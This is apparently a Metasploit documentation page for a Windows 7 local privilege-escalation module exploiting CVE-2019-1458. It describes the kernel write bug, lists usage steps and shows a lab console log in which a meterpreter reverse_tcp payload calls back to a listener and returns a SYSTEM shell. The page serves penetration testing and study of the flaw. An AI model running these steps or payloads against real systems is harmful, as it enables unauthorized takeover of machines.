metasploit-gs/documentation/modules/exploit/windows/local/ntusermessagecall.md at dcc322436b759c5208288bf2dcc33caa6feaa667

Files

T

Tim W dcc322436b Update documentation files and module description to more accurately describe what the cause of the LPE bug for CVE-2019-1458 is. also apply RuboCop edits.

2020-10-15 10:58:58 -05:00

2.8 KiB

Raw Blame History

Vulnerable Application

This module exploits CVE-2019-1458, a bug that occurs because a field within the tagSERVERINFO structure at *(gpsi+0x154) was uninitialized, which allowed user mode attackers to set extra window data pointer in a task switch window (designated by the FNID_SWITCH window class), which would otherwise only be able to be set by the kernel. By setting this extra window data pointer, an attacker can write a limited amount of data to an arbitrary kernel address in memory, thus providing them with an arbitrary kernel write primitive than can be used to elevate privileges to SYSTEM.

This module has been tested against Windows 7 x64 SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows.

Verification Steps

Get a non-SYSTEM meterpreter session on Windows 7 x64
use exploit/windows/local/ntusermessagecall
set session <session>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT 5555
exploit
Get a SYSTEM session

Scenarios

Windows 7 SP1 x64

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49157 (192.168.56.6)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermessagecall) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 1808 launched.
[*] Injecting exploit into 1808 ...
[*] Exploit injected. Injecting payload into 1808...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.6:49158) at 2020-07-10 17:10:54 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

2.8 KiB Raw Blame History

Vulnerable Application

Verification Steps

Scenarios

Windows 7 SP1 x64

2.8 KiB

Raw Blame History